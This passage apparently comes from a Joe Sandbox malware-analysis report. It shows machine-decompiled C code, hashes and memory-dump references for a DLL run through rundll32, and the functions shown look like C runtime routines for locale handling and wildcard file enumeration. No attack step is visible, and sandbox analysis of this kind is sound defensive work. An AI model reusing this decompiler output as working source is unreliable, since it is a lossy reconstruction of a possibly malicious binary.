					return _t139 | 0xffffffff;
				}
			}

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14334cd124f7857333d6a87dc4dbb4beeafbf5ac604f7dd62759596a9d004c8b
Instruction ID: 06d7e98826e9061cf5f9f575d1909f9ed043f22c31c120a23b2795546a4967bb
Opcode Fuzzy Hash: 14334cd124f7857333d6a87dc4dbb4beeafbf5ac604f7dd62759596a9d004c8b
Instruction Fuzzy Hash: E1C1D074A04259AFEB02DF98C981BADBBF4EF4A351F114159E905EF392C734AD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002F19F, Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1002F19F(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E10026850(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E10024214(4);
						_t120 = 0;
						_v8 = _t125;
						E100268B3(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x1004d788; // 0x1004d7dc
								 *_t93 = _t53;
								_t54 =  *0x1004d78c; // 0x1004e868
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x1004d790; // 0x1004e868
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x1004d7b8; // 0x1004d7e0
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x1004d7bc; // 0x1004e86c
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E10024214(4);
							_v12 = _t121;
							E100268B3(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_push(0xe);
								_push( *((intOrPtr*)(_t123 + 0xb0)));
								_push(1);
								_push( &_v24);
								_t69 = E10037D5C(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E10037D5C(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16);
								_t18 = _t93 + 8; // 0x8
								_t74 = E10037D5C(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18);
								_t77 = E10037D5C(_t113,  &_v24, 2, _t122, 0xe, _t93 + 0x30);
								_t22 = _t93 + 0x34; // 0x34
								if((E10037D5C(_t113,  &_v24, 2, _t122, 0xf, _t22) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E1002F136(_t93);
								E100268B3(_t93);
								E100268B3(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E100268B3(_v8);
								return _v16;
							}
							E100268B3();
							goto L12;
						}
						E100268B3(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x1004d788;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E100268B3( *((intOrPtr*)(_t123 + 0x7c)));
							E100268B3( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 1002F20D
_free.LIBCMT ref: 1002F219
_free.LIBCMT ref: 1002F342
_free.LIBCMT ref: 1002F34D

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e72b2000ea6275254dec66e37fb39df4ccb8ac4d77d9a4d80c0119116b12df20
Instruction ID: d13b4a520b74060ec193128ac1be29b222bffbea19a5bef822ff00477154d023
Opcode Fuzzy Hash: e72b2000ea6275254dec66e37fb39df4ccb8ac4d77d9a4d80c0119116b12df20
Instruction Fuzzy Hash: 9F61E5759003059FE720DF64EC41BAAB7F8EF49790FA1416EE959EB241EB70AD04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10026AD8, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10026AD8(void* __esi, signed int _a4, signed int* _a8) {
				signed int _v0;
				intOrPtr _v4;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short _v18;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v56;
				signed int _v60;
				signed int _v68;
				signed int* _v72;
				signed int _v84;
				signed int* _v100;
				signed int _v112;
				intOrPtr* _v160;
				intOrPtr* _v200;
				intOrPtr* _v232;
				intOrPtr* _v236;
				intOrPtr _v240;
				signed int _v252;
				struct _WIN32_FIND_DATAW _v616;
				char _v617;
				intOrPtr* _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				signed int _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				signed int _v676;
				union _FINDEX_INFO_LEVELS _v680;
				union _FINDEX_INFO_LEVELS _v684;
				intOrPtr _v852;
				void* __ebp;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t242;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int _t254;
				signed int _t255;
				intOrPtr* _t266;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				signed int _t279;
				signed int _t281;
				signed int _t286;
				signed int _t289;
				char _t291;
				signed char _t292;
				signed int _t298;
				union _FINDEX_INFO_LEVELS _t302;
				signed int _t308;
				union _FINDEX_INFO_LEVELS _t311;
				intOrPtr* _t319;
				signed int _t322;
				intOrPtr _t327;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				intOrPtr _t344;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int* _t352;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t360;
				signed int* _t361;
				signed int _t364;
				signed int _t366;
				void* _t369;
				void* _t372;
				union _FINDEX_INFO_LEVELS _t373;
				signed int _t376;
				signed int* _t378;
				signed int* _t381;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				signed int _t389;
				signed int _t391;
				signed int _t397;
				intOrPtr* _t398;
				signed int _t403;
				intOrPtr* _t404;
				signed int _t406;
				void* _t408;
				intOrPtr* _t409;
				signed int _t412;
				intOrPtr* _t415;
				signed int _t420;
				signed int _t426;
				signed int _t428;
				intOrPtr* _t439;
				signed int _t442;
				short _t443;
				signed int _t448;
				intOrPtr* _t449;
				signed int _t457;
				signed int _t459;
				intOrPtr* _t460;
				signed int _t465;
				void* _t466;
				void* _t467;
				signed int _t469;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t480;
				signed int _t482;
				intOrPtr _t483;
				signed int _t485;
				signed int* _t490;
				signed int _t491;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t497;
				signed int* _t498;
				signed int _t499;
				signed int _t501;
				signed int _t502;
				signed int _t505;
				void* _t506;
				intOrPtr _t507;
				void* _t508;
				signed int _t511;
				signed int _t516;
				void* _t517;
				void* _t518;
				signed int _t519;
				void* _t520;
				void* _t521;
				signed int _t522;
				void* _t523;
				void* _t524;
				void* _t525;
				signed int _t526;
				void* _t527;
				void* _t528;

				_t216 = _a8;
				_t521 = _t520 - 0x28;
				_t532 = _t216;
				if(_t216 != 0) {
					_t490 = _a4;
					_t364 = 0;
					 *_t216 = 0;
					_t476 = 0;
					_t217 =  *_t490;
					_t381 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t217;
					if(_t217 == 0) {
						L9:
						_v8 = _t364;
						_t219 = _t381 - _t476;
						_t491 = _t476;
						_v12 = _t491;
						_t456 = (_t219 >> 2) + 1;
						_t221 = _t219 + 3 >> 2;
						__eflags = _t381 - _t491;
						_v16 = (_t219 >> 2) + 1;
						asm("sbb esi, esi");
						_t493 =  !_t491 & _t219 + 0x00000003 >> 0x00000002;
						__eflags = _t493;
						if(_t493 != 0) {
							_t355 = _t476;
							_t473 = _t364;
							do {
								_t449 =  *_t355;
								_t20 = _t449 + 1; // 0x1
								_v20 = _t20;
								do {
									_t357 =  *_t449;
									_t449 = _t449 + 1;
									__eflags = _t357;
								} while (_t357 != 0);
								_t364 = _t364 + 1 + _t449 - _v20;
								_t355 = _v12 + 4;
								_t473 = _t473 + 1;
								_v12 = _t355;
								__eflags = _t473 - _t493;
							} while (_t473 != _t493);
							_t456 = _v16;
							_v8 = _t364;
							_t364 = 0;
							__eflags = 0;
						}
						_t494 = E10010F75(_t221, _t456, _v8, 1);
						_t522 = _t521 + 0xc;
						__eflags = _t494;
						if(_t494 != 0) {
							_v12 = _t476;
							_t224 = _t494 + _v16 * 4;
							_t382 = _t224;
							_v28 = _t224;
							_t225 = _t476;
							_v16 = _t224;
							__eflags = _t225 - _v40;
							if(_t225 == _v40) {
								L24:
								_v12 = _t364;
								 *_a8 = _t494;
								_t495 = _t364;
								goto L25;
							} else {
								_t459 = _t494 - _t476;
								__eflags = _t459;
								_v32 = _t459;
								do {
									_t235 =  *_t225;
									_t460 = _t235;
									_v24 = _t235;
									_v20 = _t460 + 1;
									do {
										_t237 =  *_t460;
										_t460 = _t460 + 1;
										__eflags = _t237;
									} while (_t237 != 0);
									_t461 = _t460 - _v20;
									_t238 = _t460 - _v20 + 1;
									_push(_t238);
									_v20 = _t238;
									_t242 = E100315C1(_t382, _v28 - _t382 + _v8, _v24);
									_t522 = _t522 + 0x10;
									__eflags = _t242;
									if(_t242 != 0) {
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										E1000E341();
										asm("int3");
										_t516 = _t522;
										_t523 = _t522 - 0x34;
										_t244 =  *0x1004d054; // 0x940b3682
										_v84 = _t244 ^ _t516;
										_t246 = _v68;
										_v112 = _t246;
										_push(_t494);
										_t498 = _v72;
										_v100 = _t498;
										__eflags = _t246;
										if(__eflags != 0) {
											_push(_t364);
											_push(_t476);
											_t478 = 0;
											 *_t246 = 0;
											_t366 = 0;
											_t247 =  *_t498;
											_t388 = 0;
											_v616.cAlternateFileName = 0;
											_v48 = 0;
											_v44 = 0;
											__eflags = _t247;
											if(_t247 == 0) {
												L42:
												_v24 = _t478;
												_t249 = _t388 - _t366;
												_t499 = _t366;
												_v28 = _t499;
												_t464 = (_t249 >> 2) + 1;
												_t251 = _t249 + 3 >> 2;
												__eflags = _t388 - _t499;
												_v36 = (_t249 >> 2) + 1;
												asm("sbb esi, esi");
												_t501 =  !_t499 & _t249 + 0x00000003 >> 0x00000002;
												__eflags = _t501;
												if(_t501 != 0) {
													_t342 = _t366;
													_t470 = _t478;
													do {
														_t439 =  *_t342;
														_t87 = _t439 + 2; // 0x2
														_v32 = _t87;
														do {
															_t344 =  *_t439;
															_t439 = _t439 + 2;
															__eflags = _t344 - _t478;
														} while (_t344 != _t478);
														_v24 = _v24 + 1 + (_t439 - _v32 >> 1);
														_t342 = _v28 + 4;
														_t470 = _t470 + 1;
														_v28 = _t342;
														__eflags = _t470 - _t501;
													} while (_t470 != _t501);
													_t464 = _v36;
												}
												_t502 = E10010F75(_t251, _t464, _v24, 2);
												_t524 = _t523 + 0xc;
												__eflags = _t502;
												if(_t502 != 0) {
													_v28 = _t366;
													_t254 = _t502 + _v36 * 4;
													_t465 = _t254;
													_v60 = _t254;
													_t255 = _t366;
													_v36 = _t465;
													__eflags = _t255 - _v48;
													if(_t255 == _v48) {
														L57:
														_v24 = _t478;
														 *_v40 = _t502;
														_t503 = _t478;
														goto L58;
													} else {
														_t397 = _t502 - _t366;
														__eflags = _t397;
														_v20 = _t397;
														do {
															_t266 =  *_t255;
															_t398 = _t266;
															_v56 = _t266;
															_v32 = _t398 + 2;
															do {
																_t268 =  *_t398;
																_t398 = _t398 + 2;
																__eflags = _t268 - _t478;
															} while (_t268 != _t478);
															_t269 = (_t398 - _v32 >> 1) + 1;
															_push(_t269);
															_v32 = _t269;
															_t403 = _t465 - _v60 >> 1;
															_t272 = E1002FBCB(_t465, _v24 - _t403, _v56);
															_t524 = _t524 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																_push(_t478);
																_push(_t478);
																_push(_t478);
																_push(_t478);
																_push(_t478);
																E1000E341();
																asm("int3");
																_push(_t516);
																_t517 = _t524;
																_push(_t403);
																_t404 = _v160;
																_t136 = _t404 + 1; // 0x1
																_t466 = _t136;
																do {
																	_t274 =  *_t404;
																	_t404 = _t404 + 1;
																	__eflags = _t274;
																} while (_t274 != 0);
																_push(_t478);
																_t480 = _a4;
																_t406 = _t404 - _t466 + 1;
																_v16 = _t406;
																__eflags = _t406 -  !_t480;
																if(_t406 <=  !_t480) {
																	_push(_t366);
																	_t139 = _t480 + 1; // 0x1
																	_t369 = _t139 + _t406;
																	_t506 = E10026850(_t369, 1);
																	_t408 = _t502;
																	__eflags = _t480;
																	if(_t480 == 0) {
																		L73:
																		_push(_v16);
																		_t369 = _t369 - _t480;
																		_t279 = E100315C1(_t506 + _t480, _t369, _v4);
																		_t525 = _t524 + 0x10;
																		__eflags = _t279;
																		if(_t279 != 0) {
																			goto L78;
																		} else {
																			_t378 = _a8;
																			_t335 = E100278B8(_t378);
																			_v16 = _t335;
																			__eflags = _t335;
																			if(_t335 == 0) {
																				 *(_t378[1]) = _t506;
																				_t511 = 0;
																				_t148 =  &(_t378[1]);
																				 *_t148 = _t378[1] + 4;
																				__eflags =  *_t148;
																			} else {
																				E100268B3(_t506);
																				_t511 = _v16;
																			}
																			E100268B3(0);
																			_t338 = _t511;
																			goto L70;
																		}
																	} else {
																		_push(_t480);
																		_t340 = E100315C1(_t506, _t369, _v0);
																		_t525 = _t524 + 0x10;
																		__eflags = _t340;
																		if(_t340 != 0) {
																			L78:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E1000E341();
																			asm("int3");
																			_push(_t517);
																			_t518 = _t525;
																			_push(_t408);
																			_t409 = _v200;
																			_push(_t369);
																			_push(0);
																			__eflags = 0;
																			_t151 = _t409 + 2; // 0x2
																			_t467 = _t151;
																			do {
																				_t281 =  *_t409;
																				_t409 = _t409 + 2;
																				__eflags = _t281;
																			} while (_t281 != 0);
																			_t482 = _v0;
																			_t412 = (_t409 - _t467 >> 1) + 1;
																			_v20 = _t412;
																			__eflags = _t412 -  !_t482;
																			if(_t412 <=  !_t482) {
																				_push(_t506);
																				_t154 = _t482 + 1; // 0x1
																				_t372 = _t154 + _t412;
																				_t507 = E10026850(_t372, 2);
																				__eflags = _t482;
																				if(_t482 == 0) {
																					L86:
																					_push(_v20);
																					_t372 = _t372 - _t482;
																					_t286 = E1002FBCB(_t507 + _t482 * 2, _t372, _v8);
																					_t526 = _t525 + 0x10;
																					__eflags = _t286;
																					if(_t286 != 0) {
																						goto L91;
																					} else {
																						_t485 = _a4;
																						_t376 = E1002793F(_t485);
																						__eflags = _t376;
																						if(_t376 == 0) {
																							 *((intOrPtr*)( *((intOrPtr*)(_t485 + 4)))) = _t507;
																							 *((intOrPtr*)(_t485 + 4)) =  *((intOrPtr*)(_t485 + 4)) + 4;
																							_t376 = 0;
																							__eflags = 0;
																						} else {
																							E100268B3(_t507);
																						}
																						E100268B3(0);
																						_t332 = _t376;
																						goto L83;
																					}
																				} else {
																					_push(_t482);
																					_t334 = E1002FBCB(_t507, _t372, _v4);
																					_t526 = _t525 + 0x10;
																					__eflags = _t334;
																					if(_t334 != 0) {
																						L91:
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						E1000E341();
																						asm("int3");
																						_push(_t518);
																						_t519 = _t526;
																						_t527 = _t526 - 0x298;
																						_t289 =  *0x1004d054; // 0x940b3682
																						_v252 = _t289 ^ _t519;
																						_t415 = _v236;
																						_t468 = _v232;
																						_push(_t372);
																						_push(_t482);
																						_t483 = _v240;
																						_v852 = _t468;
																						__eflags = _t415 - _t483;
																						if(_t415 != _t483) {
																							while(1) {
																								_t327 =  *_t415;
																								__eflags = _t327 - 0x2f;
																								if(_t327 == 0x2f) {
																									break;
																								}
																								__eflags = _t327 - 0x5c;
																								if(_t327 != 0x5c) {
																									__eflags = _t327 - 0x3a;
																									if(_t327 != 0x3a) {
																										_t415 = E10031610(_t483, _t415);
																										__eflags = _t415 - _t483;
																										if(_t415 != _t483) {
																											continue;
																										}
																									}
																								}
																								break;
																							}
																							_t468 = _v624;
																						}
																						_t291 =  *_t415;
																						_v617 = _t291;
																						__eflags = _t291 - 0x3a;
																						if(_t291 != 0x3a) {
																							L102:
																							_t373 = 0;
																							__eflags = _t291 - 0x2f;
																							if(__eflags == 0) {
																								L105:
																								_t292 = 1;
																							} else {
																								__eflags = _t291 - 0x5c;
																								if(__eflags == 0) {
																									goto L105;
																								} else {
																									__eflags = _t291 - 0x3a;
																									_t292 = 0;
																									if(__eflags == 0) {
																										goto L105;
																									}
																								}
																							}
																							_v684 = _t373;
																							_v680 = _t373;
																							_push(_t507);
																							asm("sbb eax, eax");
																							_v676 = _t373;
																							_v672 = _t373;
																							_v652 =  ~(_t292 & 0x000000ff) & _t415 - _t483 + 0x00000001;
																							_v668 = _t373;
																							_v664 = _t373;
																							_t298 = E10026A9E(_t415 - _t483 + 1, _t483,  &_v684, E100276E1(_t468, __eflags));
																							_t528 = _t527 + 0xc;
																							asm("sbb eax, eax");
																							_t302 = FindFirstFileExW( !( ~_t298) & _v676, _t373,  &_v616, _t373, _t373, _t373);
																							_t508 = _t302;
																							__eflags = _t508 - 0xffffffff;
																							if(_t508 != 0xffffffff) {
																								_t420 =  *((intOrPtr*)(_v624 + 4)) -  *_v624;
																								__eflags = _t420;
																								_v656 = _t420 >> 2;
																								do {
																									_v648 = _t373;
																									_v644 = _t373;
																									_v640 = _t373;
																									_v636 = _t373;
																									_v632 = _t373;
																									_v628 = _t373;
																									_t308 = E100269CF( &(_v616.cFileName),  &_v648,  &_v617, E100276E1(_t468, __eflags));
																									_t528 = _t528 + 0x10;
																									asm("sbb eax, eax");
																									_t311 =  !( ~_t308) & _v640;
																									__eflags =  *_t311 - 0x2e;
																									if( *_t311 != 0x2e) {
																										L113:
																										_push(_v624);
																										_push(_v652);
																										_push(_t483);
																										_push(_t311);
																										L66();
																										_t528 = _t528 + 0x10;
																										_v660 = _t311;
																										__eflags = _t311;
																										if(_t311 != 0) {
																											__eflags = _v628 - _t373;
																											if(_v628 != _t373) {
																												E100268B3(_v640);
																												_t311 = _v660;
																											}
																											_t373 = _t311;
																										} else {
																											goto L114;
																										}
																									} else {
																										_t426 =  *((intOrPtr*)(_t311 + 1));
																										__eflags = _t426;
																										if(_t426 == 0) {
																											L114:
																											__eflags = _v628 - _t373;
																											if(_v628 != _t373) {
																												E100268B3(_v640);
																											}
																											goto L116;
																										} else {
																											__eflags = _t426 - 0x2e;
																											if(_t426 != 0x2e) {
																												goto L113;
																											} else {
																												__eflags =  *((intOrPtr*)(_t311 + 2)) - _t373;
																												if( *((intOrPtr*)(_t311 + 2)) == _t373) {
																													goto L114;
																												} else {
																													goto L113;
																												}
																											}
																										}
																									}
																									L122:
																									FindClose(_t508);
																									goto L123;
																									L116:
																									__eflags = FindNextFileW(_t508,  &_v616);
																								} while (__eflags != 0);
																								_t319 = _v624;
																								_t428 = _v656;
																								_t468 =  *_t319;
																								_t322 =  *((intOrPtr*)(_t319 + 4)) -  *_t319 >> 2;
																								__eflags = _t428 - _t322;
																								if(_t428 != _t322) {
																									E10031020(_t468, _t468 + _t428 * 4, _t322 - _t428, 4, E100268ED);
																								}
																								goto L122;
																							} else {
																								_push(_v624);
																								_push(_t373);
																								_push(_t373);
																								_push(_t483);
																								L66();
																								_t373 = _t302;
																							}
																							L123:
																							__eflags = _v664;
																							if(_v664 != 0) {
																								E100268B3(_v676);
																							}
																							_t313 = _t373;
																						} else {
																							_t313 = _t483 + 1;
																							__eflags = _t415 - _t483 + 1;
																							if(_t415 == _t483 + 1) {
																								_t291 = _v617;
																								goto L102;
																							} else {
																								_push(_t468);
																								_push(0);
																								_push(0);
																								_push(_t483);
																								L66();
																							}
																						}
																						__eflags = _v24 ^ _t519;
																						return E100037EA(_t313, _v24 ^ _t519, _t468);
																					} else {
																						goto L86;
																					}
																				}
																			} else {
																				_t332 = 0xc;
																				L83:
																				return _t332;
																			}
																		} else {
																			goto L73;
																		}
																	}
																} else {
																	_t338 = 0xc;
																	L70:
																	return _t338;
																}
															} else {
																goto L56;
															}
															goto L127;
															L56:
															_t341 = _v28;
															_t469 = _v36;
															 *((intOrPtr*)(_v20 + _t341)) = _t469;
															_t255 = _t341 + 4;
															_v28 = _t255;
															_t465 = _t469 + _v32 * 2;
															_v36 = _t465;
															__eflags = _t255 - _v48;
														} while (_t255 != _v48);
														goto L57;
													}
												} else {
													_t503 = _t502 | 0xffffffff;
													_v24 = _t502 | 0xffffffff;
													L58:
													E100268B3(_t478);
													_pop(_t389);
													goto L59;
												}
											} else {
												while(1) {
													_t442 = 0x2a;
													_v20 = _t442;
													_t443 = 0x3f;
													_v18 = _t443;
													_v16 = 0;
													_t349 = E1002FC2F(_t247,  &_v20);
													_t389 =  *_t498;
													__eflags = _t349;
													if(_t349 != 0) {
														_t350 = E100272AB(_t389, _t349,  &(_v616.cAlternateFileName));
														_t523 = _t523 + 0xc;
														_v24 = _t350;
														_t503 = _t350;
													} else {
														_t351 =  &(_v616.cAlternateFileName);
														_push(_t351);
														_push(_t478);
														_push(_t478);
														_push(_t389);
														L79();
														_t503 = _t351;
														_t523 = _t523 + 0x10;
														_v24 = _t503;
													}
													__eflags = _t503;
													if(_t503 != 0) {
														break;
													}
													_t498 = _v28 + 4;
													_v28 = _t498;
													_t247 =  *_t498;
													__eflags = _t247;
													if(_t247 != 0) {
														continue;
													} else {
														_t366 = _v616.cAlternateFileName;
														_t388 = _v48;
														goto L42;
													}
													goto L127;
												}
												_t366 = _v616.cAlternateFileName;
												L59:
												_t461 = _t366;
												_v40 = _t461;
												__eflags = _v48 - _t461;
												asm("sbb ecx, ecx");
												_t391 =  !_t389 & _v48 - _t461 + 0x00000003 >> 0x00000002;
												__eflags = _t391;
												_v20 = _t391;
												if(_t391 != 0) {
													_t505 = _t391;
													do {
														E100268B3( *_t366);
														_t478 = _t478 + 1;
														_t366 = _t366 + 4;
														__eflags = _t478 - _t505;
													} while (_t478 != _t505);
													_t366 = _v616.cAlternateFileName;
													_t503 = _v24;
												}
												E100268B3(_t366);
												goto L64;
											}
										} else {
											_t352 = E1002449E(__eflags);
											_t503 = 0x16;
											 *_t352 = _t503;
											E1000E314();
											L64:
											__eflags = _v12 ^ _t516;
											return E100037EA(_t503, _v12 ^ _t516, _t461);
										}
									} else {
										goto L23;
									}
									goto L127;
									L23:
									_t354 = _v12;
									_t448 = _v16;
									 *((intOrPtr*)(_v32 + _t354)) = _t448;
									_t225 = _t354 + 4;
									_t382 = _t448 + _v20;
									_v16 = _t448 + _v20;
									_v12 = _t225;
									__eflags = _t225 - _v40;
								} while (_t225 != _v40);
								goto L24;
							}
						} else {
							_t495 = _t494 | 0xffffffff;
							_v12 = _t495;
							L25:
							E100268B3(_t364);
							_pop(_t383);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t364;
							_t359 = E100315D0(_t217,  &_v8);
							_t383 =  *_t490;
							__eflags = _t359;
							if(_t359 != 0) {
								_push( &_v44);
								_push(_t359);
								_push(_t383);
								L92();
								_t521 = _t521 + 0xc;
								_v12 = _t359;
								_t495 = _t359;
							} else {
								_t360 =  &_v44;
								_push(_t360);
								_push(_t364);
								_push(_t364);
								_push(_t383);
								L66();
								_t495 = _t360;
								_t521 = _t521 + 0x10;
								_v12 = _t495;
							}
							__eflags = _t495;
							if(_t495 != 0) {
								break;
							}
							_t490 = _a4 + 4;
							_a4 = _t490;
							_t217 =  *_t490;
							__eflags = _t217;
							if(_t217 != 0) {
								continue;
							} else {
								_t476 = _v44;
								_t381 = _v40;
								goto L9;
							}
							goto L127;
						}
						_t476 = _v44;
						L26:
						_t457 = _t476;
						_v32 = _t457;
						__eflags = _v40 - _t457;
						asm("sbb ecx, ecx");
						_t385 =  !_t383 & _v40 - _t457 + 0x00000003 >> 0x00000002;
						__eflags = _t385;
						_v28 = _t385;
						if(_t385 != 0) {
							_t497 = _t385;
							do {
								E100268B3( *_t476);
								_t364 = _t364 + 1;
								_t476 = _t476 + 4;
								__eflags = _t364 - _t497;
							} while (_t364 != _t497);
							_t476 = _v44;
							_t495 = _v12;
						}
						E100268B3(_t476);
						goto L31;
					}
				} else {
					_t361 = E1002449E(_t532);
					_t495 = 0x16;
					 *_t361 = _t495;
					E1000E314();
					L31:
					return _t495;
				}
				L127:
			}

APIs

_free.LIBCMT ref: 10026C72

Strings

*?, xrefs: 10026B1B

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: c56d30aa011644074e53267160d15b05e436b7d09828aa63056be6a414574a16
Instruction ID: 847a7b85ac657849b28afe8b1ecbe38e924a00e319cb61a108d93b801de08f7f
Opcode Fuzzy Hash: c56d30aa011644074e53267160d15b05e436b7d09828aa63056be6a414574a16
Instruction Fuzzy Hash: 4AE15B75E0021A9FCB14CFA8D8819EEFBF5EF4C350B65816AE815E7340E771AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 10025C61, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10025C61(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed short _v772;
				void* __ebp;
				signed int _t152;
				void* _t159;
				signed int _t160;
				signed int _t162;
				signed int _t163;
				intOrPtr _t164;
